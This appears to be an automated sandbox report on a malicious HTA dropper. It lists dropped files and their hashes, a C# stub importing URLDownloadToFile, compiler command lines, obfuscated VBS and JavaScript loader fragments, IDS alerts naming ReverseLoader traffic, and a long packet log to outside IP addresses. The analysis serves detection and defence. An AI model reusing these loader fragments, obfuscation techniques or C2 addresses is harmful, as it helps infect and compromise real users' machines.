Preview:	.using System;.using System.Runtime.InteropServices;..namespace RwUGrR.{. public class hWrdxmUaWg. {. [DllImport("UrLMoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr yjBGU,string fr,string DEq,uint nTGyTsAmGik,IntPtr KAFK);.. }..}.

C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
Category:	dropped
Size (bytes):	367
Entropy (8bit):	5.236022567168268
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2Fi23fSNgazxs7+AEszIFi23fSNgUAn:p37Lvkmb6KoZqbWZE3Zq1An
MD5:	D226BDF7970CB4B615074B3EF68E5563
SHA1:	0EE83E6EA941D585D933DF973313F056966DAFE4
SHA-256:	33C80964D403DAF405DDB25BE8DA70B9E6D1831ADD47C11E237454C281BA716B
SHA-512:	A20F08E4628D505C557BF4F2FD979CBFC2EDC0455BF7D3804497F8DCACD5581A93ECD78042CD88584A507C81D8B3DE510830F3EC0CB8A191EF8F75ACE5746622
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.0.cs"

C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8215640921101897
Encrypted:	false
SSDEEP:	24:etGSXWPBG5eM7p8amzkwlAU1LDtkZf0GYWjqhkWI+ycuZhNUPakSloPNnq:6X9sM+ayAU1mJ0KEH1ulSa32q
MD5:	933FC69B370D7D42D87D06D9C50A638C
SHA1:	5F0996018310F53DDC03823CB900C4D06DEE6784
SHA-256:	88D1D577ECC93A4BCD2F0996BCCA1BAFEE1F06146A682559EDA7C1C9DD95CBA7
SHA-512:	E38770AB6E991E38A518D30534870B42220D96B31757F96806396D0E5375BB3940BACDD877C3221FCD9997887B41A6B4DFCDD9DE0D0AFFB3813BEF17AABB49A8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....oMg...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................9.2.....v.....v...........................".............. @.....P ......R.........X.....^.....a.....e.....q...R.....R...!.R.....R.......!............@.......................................)..........<Module>.rl

C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
Category:	modified
Size (bytes):	864
Entropy (8bit):	5.299613290658648
Encrypted:	false
SSDEEP:	24:KYqd3ka6K4NEJ5uKax5DqBVKVrdFAMBJTH:3ika6VNEJ5uK2DcVKdBJj
MD5:	7AAF4BAAA9811714716CEEA424564027
SHA1:	B7F19AB4AABCAE49003C4287A0E6D17A554B1864
SHA-256:	2948589A3AEA70359D46D7B33CAD784649ECC94960D209B14408F85764159277
SHA-512:	82B0B694A7D886908A2D295ED46FE53E64441B0DDFA0BB15F260622E0861989DDB3D3881D87541BEB0DA18B2B7F9AC8120AD532518663E454159A5EBAC409272
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3453), with CRLF line terminators
Category:	dropped
Size (bytes):	154384
Entropy (8bit):	3.8033508297517873
Encrypted:	false
SSDEEP:	3072:ECFOB9LjxbTAKZGEDqmCFOB9LjxbTAKZGEDMCFOB9LjxbTAKZGEDP:EcoBWKZGEDqmcoBWKZGEDMcoBWKZGEDP
MD5:	297E6244E9EDCAEB8B1F6705E40CB51D
SHA1:	230882871D7FF55237292422E02EEF841CF5F21E
SHA-256:	9CCE8E2B2E0A7512420E3C93DEC3B33DB128D7FD694F6FC9AE1C8C9FF9817365
SHA-512:	F722D14668F8B75AB7B2DB08FF3A2D2B85007C8902E213B094C24DB2694E785AFF8D41F0117E18414E4807AA30BA2A57C01C16186B046B23C64E7F4320D972AE
Malicious:	true
Preview:	...... . . . .....Q.k.i.x.m.W.O.c.e.K.O.z.a.U.i. .=. .".j.W.W.L.N.q.L.L.Z.S.T.j.J.n.h.".....h.N.L.W.d.i.k.L.k.j.U.p.e.P.K. .=. .".P.C.l.a.h.f.W.L.d.z.c.G.L.O.h.".....e.a.q.A.q.s.K.W.K.W.i.e.m.h.C. .=. .".o.L.s.O.k.N.A.t.k.L.N.p.g.u.I.".........q.P.d.P.P.Q.m.t.x.W.B.R.o.L.W. .=. .".W.f.B.z.R.l.Z.c.W.U.N.S.A.i.q.".....T.U.c.N.i.e.L.t.U.L.z.B.i.O.A. .=. .".p.h.L.N.m.i.b.O.N.t.o.e.U.Z.P.".....B.W.n.L.t.A.u.b.L.W.u.f.c.a.G. .=. .".L.c.U.n.h.L.o.k.n.L.L.Z.G.o.T.".....N.J.z.W.W.Z.f.x.L.N.W.a.Z.h.A. .=. .".p.G.N.p.G.C.f.t.H.L.e.h.L.K.p.".....c.e.h.l.P.Q.P.t.k.z.S.Z.k.A.e. .=. .".B.K.N.i.i.K.U.q.c.W.m.B.i.e.c.".....b.k.o.v.K.L.h.K.A.P.W.K.L.K.U. .=. .".l.i.G.l.d.C.f.W.B.c.e.c.c.h.z.".....U.A.u.u.B.g.s.R.L.S.Q.G.Q.L.H. .=. .".P.W.L.k.f.K.h.h.W.A.W.g.L.L.Z.".....u.W.k.e.i.W.i.U.K.L.h.l.W.k.q. .=. .".L.W.o.T.K.B.L.Q.L.o.b.c.x.a.G.".....K.p.m.p.K.L.L.m.i.e.c.i.v.L.L. .=. .".Z.L.K.O.q.k.f.h.u.e.L.B.Z.Q.L.".....O.N.k.C.f.h.N.W.G.u.W.e.L.W.T. .=. .".k.W.N.f.p.z.L.t.O.K.v.l.L.e.C.".....d.K.k.t.U.U.G.U.

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	2.478404137107947
TrID:
File name:	seemebestthingsgivenmegood.hta
File size:	159'457 bytes
MD5:	51d8ef6ebcd710802189071e5ad9f154
SHA1:	3d0178a66a7ed8fb3b53c7b85ea447043ed51ac3
SHA256:	66a1e9b4e372b5040f6cd336d1bc57381b4486e56c4b0e114819b49514b21a20
SHA512:	cf352aac8d86126a3c50a1b304245d2c4b94dda902818b250f2b089e1b38240f9e13dd7f84b22c657c133c4e91a5b3cf90c2aa9e63f4909be629a4ef6788a7e6
SSDEEP:	96:4owZw9d6yfag3at3EUW87FEtLbJte8I40Jduvpv3at3EUW87FEtLbYZte8I40Jd/:4Lw3OmHsaZYJPdQ
TLSH:	CCF30D41A9240065F7FD5E96ADEDB74F35A4221E9EC99D8D4327FB80DCB328BA4409CC
File Content Preview:	<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%252

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-02T07:38:00.234524+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.10	49704	146.70.113.200	80	TCP
2024-12-02T07:38:11.945112+0100	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	142.215.209.77	443	192.168.2.10	49716	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 07:37:58.530302048 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:37:58.650186062 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:37:58.650259972 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:37:58.650535107 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:37:58.770554066 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234441996 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234455109 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234467030 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234524012 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.234587908 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234601974 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234612942 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234625101 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234639883 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.234672070 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.234831095 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234842062 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234848976 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.234884977 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.234973907 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.354475021 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.354487896 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.354521990 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.354548931 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.456535101 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.456548929 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.456604004 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.456621885 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.460818052 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.460833073 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.460918903 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.460946083 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.467195034 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.467226982 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.467250109 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.467267990 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.475626945 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.475692034 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.475727081 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.475917101 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.484033108 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.484086990 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.484132051 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.484173059 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.492428064 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.492552996 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.492650032 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.500830889 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.500900984 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.500940084 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.501025915 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.509227037 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.509278059 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.509351015 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.509485006 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.517585993 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.517688036 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.517739058 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.525986910 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.526047945 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.526117086 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.526155949 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.534447908 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.534502029 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.534550905 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.534610987 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.678550005 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.678561926 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.678642988 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.680207014 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.680274010 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.680325031 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.685944080 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.685997009 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.686058044 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.686103106 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.691663980 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.691771984 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.691781044 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.691826105 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.697463036 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.697521925 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.697521925 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.697568893 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.703140020 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.703187943 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.703263044 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.703562975 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.708892107 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.708987951 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.709002972 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.709085941 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.714627981 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.714725971 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.714747906 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.714811087 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.720333099 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.720454931 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.720510006 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.720510006 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.726043940 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.726203918 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.726228952 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.726425886 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.731827974 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.731884003 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.732287884 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.737570047 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.737617016 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.738045931 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.743248940 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.743307114 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.743356943 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.743621111 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.749031067 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.749128103 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.749149084 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.749291897 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.754748106 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.754818916 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.754849911 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.755074024 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.760447979 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.760556936 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.760616064 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.760821104 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.766331911 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.766345978 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.766503096 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.771898031 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.772025108 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.772063017 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.772284985 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.777595997 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.777723074 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.901091099 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.901148081 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.901212931 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.901407003 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.903167009 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.903224945 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.903259039 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.903295040 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.907335997 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.907454014 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.907494068 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.910725117 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.911478043 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.911588907 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.911679983 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.915576935 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.915726900 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.915978909 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.919905901 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.919977903 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.920322895 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.923940897 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.924000025 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.924069881 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.928057909 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.928164959 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.928196907 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.928327084 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.932239056 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.932306051 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.932328939 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.932502985 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.936332941 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.936446905 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.936475039 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.936805964 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.940510988 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.940643072 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.940680027 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.940815926 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.944632053 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.944727898 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.944736958 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.944828987 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.948767900 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.948858023 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.948889017 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.949003935 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.952984095 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.953043938 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.953336000 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.957052946 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.957149982 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.957354069 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.961198092 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.961218119 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.961270094 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.961270094 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.965346098 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.965421915 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.965445042 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.965550900 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.969468117 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.969579935 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.969593048 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.969680071 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.973639011 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.973747015 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.973813057 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.973922968 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.977780104 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.977885008 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.977904081 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.978085995 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.981945038 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.981998920 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.982033968 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.982203960 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.986092091 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.986193895 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.986229897 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.986526012 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.990226984 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.990323067 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.990370035 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.990396976 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.994380951 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.994471073 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.994508028 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.994584084 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:00.998528004 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.998645067 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:00.998833895 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:01.002648115 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:01.002702951 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:01.002923965 CET	49704	80	192.168.2.10	146.70.113.200
Dec 2, 2024 07:38:01.006831884 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:01.006926060 CET	80	49704	146.70.113.200	192.168.2.10
Dec 2, 2024 07:38:01.006962061 CET	49704	80	192.168.2.10	146.70.113.200
